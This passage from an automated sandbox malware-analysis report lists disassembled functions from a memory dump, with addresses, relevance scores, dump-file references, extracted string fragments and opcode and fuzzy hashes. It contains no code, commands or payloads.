                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 9|W$]5<K
                                          • API String ID: 0-2740929668
                                          • Opcode ID: 9c7338d929fb4dc0a827d9f0617a15c1aeb5c060357b193b53a88440711ac8d5
                                          • Instruction ID: bfc202c627d6cb0d09bc6f6d40c23d3b9c3af9f3460c717ff5c105bfcee5479b
                                          • Opcode Fuzzy Hash: 9c7338d929fb4dc0a827d9f0617a15c1aeb5c060357b193b53a88440711ac8d5
                                          • Instruction Fuzzy Hash: 75514BF39083049BE7047E3DED8477ABBD9EB94360F17463EE6C983784E57A58048682
                                          Function 009F0E1A Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: A%7$FoO
                                          • API String ID: 0-3590906921
                                          • Opcode ID: 813c2607d45b3e4b90bfbec41fdaf9b659cc1629e8a3b0366008e3a5a416ce64
                                          • Instruction ID: 641a8457500ba06a5a0f826325889ea421380d68b281aafcf2a9a2b71745d66f
                                          • Opcode Fuzzy Hash: 813c2607d45b3e4b90bfbec41fdaf9b659cc1629e8a3b0366008e3a5a416ce64
                                          • Instruction Fuzzy Hash: EF4115B3A082148BE300AE2DDC9477ABBEAEBC4710F16853DEAC897745E9355C058786
                                          Function 0095E970 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: efg`$efg`
                                          • API String ID: 0-3010568471
                                          • Opcode ID: 99b52bab3d5bca4884a55df1a6a85b2bac7538923d1ada5801132de7b3091caa
                                          • Instruction ID: 3488c1a65f9029218c3ae399efe3a96745c9d899228eb9af8d8edd8a15239982
                                          • Opcode Fuzzy Hash: 99b52bab3d5bca4884a55df1a6a85b2bac7538923d1ada5801132de7b3091caa
                                          • Instruction Fuzzy Hash: CA31E232A183508BC328CF52C5A166FB392BFE4301F5A482DDDC667255CE319E0AC7D2
                                          Function 00978CB0 Relevance: 1.7, Strings: 1, Instructions: 490COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: st@
                                          • API String ID: 0-3741395493
                                          • Opcode ID: b8b6723f97c020fcee12aa26fe1da8dde312511435b133966649d20cc08dec4e
                                          • Instruction ID: 5eff3019d6a60ac714e50db64c1e507f876fadcccbf12087d1cbac2eee1b8b51
                                          • Opcode Fuzzy Hash: b8b6723f97c020fcee12aa26fe1da8dde312511435b133966649d20cc08dec4e
                                          • Instruction Fuzzy Hash: 65F125B251C3818FD304DF68885136BBBE6AF95304F18886DE5D987382DB79D909CB92
                                          Function 00978770 Relevance: 1.7, Strings: 1, Instructions: 466COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: =:;8
                                          • API String ID: 2994545307-508151936
                                          • Opcode ID: 0ce44370a775714d7aa3b475fcb7f16cc59bb089a95ae525883f1357a25b996c
                                          • Instruction ID: 0b13ee12262c876f6569a2b07844c4dedc42f0e71e182ab27f7433f6a3c08728
                                          • Opcode Fuzzy Hash: 0ce44370a775714d7aa3b475fcb7f16cc59bb089a95ae525883f1357a25b996c
                                          • Instruction Fuzzy Hash: A8D15C73A983118BD714CA28CC86377B796EBC5314F1DC93DD98A4B391EA749C06C792
                                          Function 00969530 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: efg`
                                          • API String ID: 0-115929991
                                          • Opcode ID: 353dd49fb77271c6dced7784c5efd7f2c674e4943589bfe80d1992964723fba2
                                          • Instruction ID: 50037e331a0b223c8b08031962c6692824292825142558e0f0777e2975bd0e38
                                          • Opcode Fuzzy Hash: 353dd49fb77271c6dced7784c5efd7f2c674e4943589bfe80d1992964723fba2
                                          • Instruction Fuzzy Hash: 5FC13671D14215CFCB24CF58DC92ABB73B8FF86314F184569E852A72A1E734A901CBA1
                                          Function 00990F60 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: _^]\
                                          • API String ID: 2994545307-3116432788
                                          • Opcode ID: a90e9950eb8ec0a279ecf2f14c16affc7f51309681c3c2091812ff16993e8774
                                          • Instruction ID: 6240d7a44d74ed097f5b2e5cb62cc955378cb81ccfbb107c90b2707df1462300
                                          • Opcode Fuzzy Hash: a90e9950eb8ec0a279ecf2f14c16affc7f51309681c3c2091812ff16993e8774
                                          • Instruction Fuzzy Hash: 1B81CE352083429FCB28EF1CD490A2AB7E5FF99710F05896CE9928B365D731EC51CB82
                                          Function 009561A0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,
                                          • API String ID: 0-3772416878
                                          • Opcode ID: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                                          • Instruction ID: 75ddab23a2a904666719939ceb43697c5965758eae4aba361bdb9d122e5372ce
                                          • Opcode Fuzzy Hash: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                                          • Instruction Fuzzy Hash: D8B137712083819FD325CF59C89061BFBE0AFA9704F844E2DF5D997782D631E918CBA6
                                          Function 0098BCE0 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: 5|iL
                                          • API String ID: 2994545307-1880071150
                                          • Opcode ID: 26ac3d9820245d020d7b6750740a60eebcee687043529f5e948b158b1ea58688
                                          • Instruction ID: 7d6306c036a7916675be22b21b80cdd192e647b9ea1f247da0ec6fc488121c06
                                          • Opcode Fuzzy Hash: 26ac3d9820245d020d7b6750740a60eebcee687043529f5e948b158b1ea58688
                                          • Instruction Fuzzy Hash: B6710A32A193109FC714AF2DCC80667B7A6EBC5324F1D866DE9959B3A5C371DC028BC1
                                          Function 00A58D26 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: >9y[
                                          • API String ID: 0-407815250
                                          • Opcode ID: e48791e5090c15be74c0e1c7f72e13ab632b46fd699a1cd6583225d9cbfc319b
                                          • Instruction ID: 85080a7bdb9a8a84f63410ad13ec56b18017c88be80a390a83932b3b29630441
                                          • Opcode Fuzzy Hash: e48791e5090c15be74c0e1c7f72e13ab632b46fd699a1cd6583225d9cbfc319b
                                          • Instruction Fuzzy Hash: 106149F3E092045BF3146A29DC4472AB7EADBE4320F1B463DDE8893780F97A1D064596
                                          Function 009DEFA3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Y'EP
                                          • API String ID: 0-1277568485
                                          • Opcode ID: f1ed2769f867e75a7c4e71a4e446900c4bbfedd899c4d02dc495c603d64bd003
                                          • Instruction ID: c1296fef223c63ca59163e08c3c60dc50fdb9f2efe61fb513de582dccc96b952
                                          • Opcode Fuzzy Hash: f1ed2769f867e75a7c4e71a4e446900c4bbfedd899c4d02dc495c603d64bd003
                                          • Instruction Fuzzy Hash: 3B6118F3A186049FE3046E28DCD577EBBD5EB98320F1A493DEBC497780D63958058686
                                          Function 0095E0D8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: efg`
                                          • API String ID: 2994545307-115929991
                                          • Opcode ID: 8081bbb3337ef52eee12225f370bf1b32451a4669d485a1eb7c1eebf5a2ce31e
                                          • Instruction ID: a47258d666b7985cf0fd3727927687be77ce762727df9d3ac300d534f0f0c0e4
                                          • Opcode Fuzzy Hash: 8081bbb3337ef52eee12225f370bf1b32451a4669d485a1eb7c1eebf5a2ce31e
                                          • Instruction Fuzzy Hash: 1E515A72A087504BD725EF629C827AF73A7AFD1305F194428ED8D67246DF316A0A83D3
                                          Function 009C156C Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: <
                                          • API String ID: 0-930352506
                                          • Opcode ID: 9ee006b158cb6a19ed6725d10c65d91de5fe012e2c2d084feaefc10b665aab3b
                                          • Instruction ID: 6b968659ca16910277573f6c4a2f99b4c6c69a6e84d9f6dd877bd0011080fe81
                                          • Opcode Fuzzy Hash: 9ee006b158cb6a19ed6725d10c65d91de5fe012e2c2d084feaefc10b665aab3b
                                          • Instruction Fuzzy Hash: 3F5126F3A092049FF344AE29DC4576AF7E6EFD4720F16C53DE6C487748EA3888068656
                                          Function 00A4E3B8 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
